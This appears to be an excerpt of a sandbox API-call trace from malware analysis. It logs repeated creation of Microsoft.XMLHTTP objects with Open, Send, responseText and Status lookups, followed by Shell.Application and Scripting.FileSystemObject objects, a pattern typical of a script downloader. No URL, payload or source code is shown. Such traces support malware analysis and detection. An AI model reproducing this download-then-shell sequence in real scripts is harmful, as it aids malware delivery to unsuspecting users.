	[0571.088] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0571.089] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0571.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0571.089] ??2@YAPEAX_K@Z () returned 0x62f330
	[0571.089] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0571.089] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0571.089] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0571.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0571.089] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0571.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0571.089] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0571.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0571.089] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0571.090] SysStringLen (param_1=0x0) returned 0x0
	[0571.090] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0571.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0571.090] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0571.090] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0571.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0571.090] ??2@YAPEAX_K@Z () returned 0x62f310
	[0571.090] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0571.090] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0571.090] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0571.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0571.090] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0571.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0571.091] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0571.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0571.091] longjmp () 
	[0571.091] longjmp () 
	[0571.091] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0571.091] SysStringLen (param_1=0x0) returned 0x0
	[0571.091] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0571.091] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0571.091] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0571.093] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0571.093] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0571.093] ??2@YAPEAX_K@Z () returned 0x62f330
	[0571.094] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0571.094] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0571.094] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0571.094] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0571.094] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0571.094] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0571.094] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0571.094] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0571.094] longjmp () 
	[0571.094] longjmp () 
	[0571.095] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0571.095] SysStringLen (param_1=0x0) returned 0x0
	[0571.095] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0571.095] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0571.095] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0571.095] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0571.095] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0571.095] ??2@YAPEAX_K@Z () returned 0x62f310
	[0571.095] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0571.095] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0571.095] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0571.095] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0571.095] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0571.095] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0571.095] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0571.096] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0571.096] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0571.096] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0571.096] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0573.098] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0573.098] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0573.098] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0573.098] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0573.098] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0573.099] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0573.099] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0573.099] SysStringLen (param_1=0x0) returned 0x0
	[0573.099] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0573.099] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0573.099] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0573.099] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0573.099] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0573.099] ??2@YAPEAX_K@Z () returned 0x62f350
	[0573.099] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0573.099] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0573.099] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0573.099] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0573.099] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0573.099] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0573.099] SysStringLen (param_1=0x0) returned 0x0
	[0573.099] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0573.102] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0573.102] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0573.102] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0573.102] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0573.102] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0573.102] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0575.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0575.663] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0575.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0575.667] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0575.667] SysStringLen (param_1=0x0) returned 0x0
	[0575.668] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0575.668] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
